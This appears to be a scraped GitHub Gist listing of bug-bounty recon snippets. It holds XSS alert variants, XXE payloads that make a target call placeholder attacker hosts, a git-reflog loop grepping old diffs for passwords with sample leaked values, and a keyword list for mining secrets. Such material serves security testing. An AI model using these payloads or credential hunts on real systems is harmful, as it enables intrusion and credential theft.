This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
Jann Moon scumdestroy
⛓️
yassineaboukir
/ alert.js
Created
March 24, 2021 14:08
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
bendtheory
/ burplist.py
Created
January 21, 2021 05:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import xml.etree.ElementTree as ET | |
| import urllib | |
| import base64 | |
| import math | |
| import sys | |
| import re | |
| # usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
| # python burplist.py burprequests.xml | |
| # output is saved to wordlist.txt |
fuckup1337
/ JavascriptRecon.md
Created
January 18, 2021 20:02
My Javascript Recon Process - BugBounty
fuckup1337
/ Git Creds.md
Created
January 8, 2021 00:59
— forked from int0x80/Git Creds.md
Finding creds in git repos is awesome.
$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
unk9vvn
/ Unk9_Kali.sh
Last active
November 28, 2024 01:40
Powerful Tools for CTF Players for Kali Linux Opration System
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # v78 | |
| # unk9vvn@avi:~$ sudo chmod +x Unk9_Kali.sh;sudo ./Unk9_Kali.sh | |
| RED='\e[1;31m%s\e[0m\n' | |
| GREEN='\e[1;32m%s\e[0m\n' | |
| YELLOW='\e[1;33m%s\e[0m\n' | |
| BLUE='\e[1;34m%s\e[0m\n' |
honoki
/ xxe-payloads.txt
Last active
July 29, 2025 07:13
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
ozzi-
/ all_curl.sh
Created
August 3, 2020 11:26
get response code, all headers, specific headers and response body from CURL
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| res=$(curl "https://zgheb.com" -i -sS -w "\r\n%{http_code}") | |
| responseCode=$(echo "$res" | tail -1) | |
| headersAndBody=$(echo "$res" | head -n -1) | |
| headers=$(echo "$headersAndBody" | awk '{if($0=="\r")exit;print}') | |
| body=$(echo "$headersAndBody" | awk '{if(body)print;if($0=="\r")body=1}') | |
| powered=$(echo "$res" | grep -Fi "X-Powered-By" | cut -d ":" -f2 | awk '{$1=$1};1') | |
| echo "Response Code:" |
yassineaboukir
/ List of API endpoints & objects
Last active
September 24, 2025 15:54
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
EdOverflow
/ gitgrepper
Created
April 19, 2018 15:27
Simple Bash script to find interesting data in GIT logs.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "*** Running..." | |
| keywords=( | |
| "password" | |
| "key" | |
| "passwd" | |
| "secret" | |
| ) |